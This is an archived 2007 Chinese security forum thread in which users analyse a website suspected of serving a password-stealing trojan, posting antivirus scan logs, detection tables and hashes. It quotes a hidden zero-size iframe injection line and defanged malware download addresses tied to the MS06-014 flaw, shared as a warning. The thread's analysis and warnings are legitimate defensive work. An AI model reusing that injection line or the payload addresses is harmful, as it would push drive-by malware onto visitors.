发一个挂了木马的网址

linovo

怀疑给人挂了木马：http://www.yp520.com
微点报未知木马，用其他杀软的测试一下是什么病毒
生成物见附件

[ 本帖最后由 linovo 于 2007-3-5 14:17 编辑 ]

soul20010

附件文件不存在或无法读入，请与管理员联系。

mofunzone

norton.sys漏掉，已经上报了
Starting the file scan:

Begin scan in 'C:\Documents and Settings\Administrator\My Documents\����.rar'
C:\Documents and Settings\Administrator\My Documents\
  ����.rar
    [0] Archive type: RAR
    --> EWTRMLR.com
        [DETECTION] Is the Trojan horse TR/Crypt.NSPM.Gen
        [WARNING]   Infected files in archives cannot be repaired!
    --> NORTON.SYS
    --> RUND1132.exe
        [DETECTION] Is the Trojan horse TR/Crypt.NSPM.Gen
        [WARNING]   Infected files in archives cannot be repaired!
        [INFO]      The file was deleted!

icka

确实给中了木马了.
挂的地址是hXXp://60.169.0.66/007/007.exe
Antivirus Version Update Result
AntiVir 7.3.1.38 03.04.2007 TR/Crypt.NSPM.Gen
Authentium 4.93.8 03.04.2007 Possibly a new variant of W32/PWStealer.gen1
Avast 4.7.936.0 03.03.2007  no virus found
AVG 7.5.0.447 03.04.2007  no virus found
BitDefender 7.2 03.05.2007  no virus found
CAT-QuickHeal 9.00 03.05.2007 (Suspicious) - DNAScan
ClamAV devel-20060426 03.05.2007  no virus found
DrWeb 4.33 03.05.2007  no virus found
eSafe 7.0.14.0 03.04.2007 suspicious Trojan/Worm
eTrust-Vet 30.6.3455 03.05.2007 Win32/NSAnti
Ewido 4.0 03.04.2007  no virus found
FileAdvisor 1 03.05.2007  no virus found
Fortinet 2.85.0.0 03.05.2007 suspicious
F-Prot 4.3.1.45 03.04.2007 W32/PWStealer.gen1
F-Secure 6.70.13030.0 03.05.2007  no virus found
Ikarus T3.1.1.3 03.05.2007 Trojan-PWS.Win32.OnLineGames.id
Kaspersky 4.0.2.24 03.05.2007  no virus found
McAfee 4975 03.02.2007  no virus found
Microsoft 1.2204 03.05.2007  no virus found
NOD32v2 2094 03.04.2007 probably unknown NewHeur_PE virus
Norman 5.80.02 03.02.2007  no virus found
Panda 9.0.0.4 03.04.2007 Suspicious file
Prevx1 V2 03.05.2007  no virus found
Sophos 4.14.0 03.03.2007  no virus found
Sunbelt 2.2.907.0 03.01.2007  no virus found
Symantec 10 03.05.2007  no virus found
TheHacker 6.1.6.069 03.05.2007  no virus found
UNA 1.83 03.02.2007  no virus found
VBA32 3.11.2 03.03.2007 MalwareScope.Worm.Viking.3
VirusBuster 4.3.19:9 03.04.2007 no virus found


Aditional Information
File size: 48245 bytes
MD5: 5f6575fda2abe4b9846adbe66a5dfd8c
SHA1: b87393408e59c9a434954a94bacf2f9829f368c9

mofunzone

感觉我用opera每次这种东西都没反应的？？
Starting the file scan:

Begin scan in 'C:\Documents and Settings\Administrator\My Documents\007.rar'
C:\Documents and Settings\Administrator\My Documents\
  007.rar
    [0] Archive type: RAR
    --> 007.exe
        [DETECTION] Is the Trojan horse TR/Crypt.NSPM.Gen
        [WARNING]   Infected files in archives cannot be repaired!
        [WARNING]   The file was ignored!
AntiVir         Found TR/Crypt.NSPM.Gen
ArcaVir         Found nothing
Avast         Found nothing
AVG Antivirus         Found nothing
BitDefender         Found nothing
ClamAV         Found nothing
Dr.Web         Found nothing
F-Prot Antivirus         Found Possibly a new variant of W32/PWStealer.gen1
F-Secure Anti-Virus         Found nothing
Fortinet         Found nothing
Kaspersky Anti-Virus         Found nothing
NOD32         Found probably unknown NewHeur_PE (probable variant)
Norman Virus Control         Found nothing
Panda Antivirus         Found nothing
VirusBuster         Found nothing
VBA32         Found MalwareScope.Worm.Viking.3

[ 本帖最后由 mofunzone 于 2007-3-4 23:17 编辑 ]

icka

用的MS06-014的漏洞,
最终链接的病毒网页其实为

document.write ("<iframe src='htxp://60.169.0.66/007/sysqq.htm' width=0 height=0></iframe>");

别点里面的链接哦.

mofunzone

原帖由 icka 于 2007-3-4 23:21 发表
用的MS06-014的漏洞,
最终链接的病毒网页其实为

document.write ("<iframe src='htxp://60.169.0.66/007/sysqq.htm' width=0 height=0></iframe>");

别点里面的链接哦.

我点了。。
没东西。。

icka

那当然了,加密的网页病毒,你右键查看源代码就知道了.还原后就可以看到那个007.exe

呵呵,你用的沙箱啊.呵呵,那怎么访问都没啥事情了

[ 本帖最后由 icka 于 2007-3-5 15:35 编辑 ]

allenhippo

打了补丁就不会下载了

鼻耳盖子